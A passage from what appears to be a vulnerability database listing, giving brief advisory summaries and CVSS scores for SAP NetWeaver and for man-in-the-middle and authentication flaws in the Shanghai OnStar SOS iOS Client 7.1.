Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition.
SAP NetWeaver 7.00 through 7.02, 7.50 through 7.52, 7.10, 7.11, 7.30, 7.31, and 7.40 are vulnerable
VAR-201801-0960 | CVE-2017-12697 | General Motors - Shanghai OnStar of SOS iOS Client Vulnerable to information disclosure |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
A Man-in-the-Middle issue was discovered in General Motors (GM) and Shanghai OnStar (SOS) SOS iOS Client 7.1. Successful exploitation of this vulnerability may allow an attacker to intercept sensitive information when the client connects to the server. General Motors Shanghai OnStar is prone to multiple security vulnerabilities.
Shanghai OnStar 7.1 is vulnerable; other versions may also be affected
VAR-201801-0959 | CVE-2017-12695 | General Motors - Shanghai OnStar of SOS iOS Client Authentication vulnerability |
CVSS V2: 4.0 CVSS V3: 8.8 Severity: HIGH |
An Improper Authentication issue was discovered in General Motors (GM) and Shanghai OnStar (SOS) SOS iOS Client 7.1. Successful exploitation of this vulnerability may allow an attacker to subvert security mechanisms and reset a user account password. General Motors Shanghai OnStar is prone to multiple security vulnerabilities.
Attackers may exploit these issues to gain unauthorized complete access to the affected application by bypassing intended security restrictions, or to perform a man-in-the-middle attack to edit or view sensitive information that may aid in launching further attacks.
Shanghai OnStar 7.1 is vulnerable; other versions may also be affected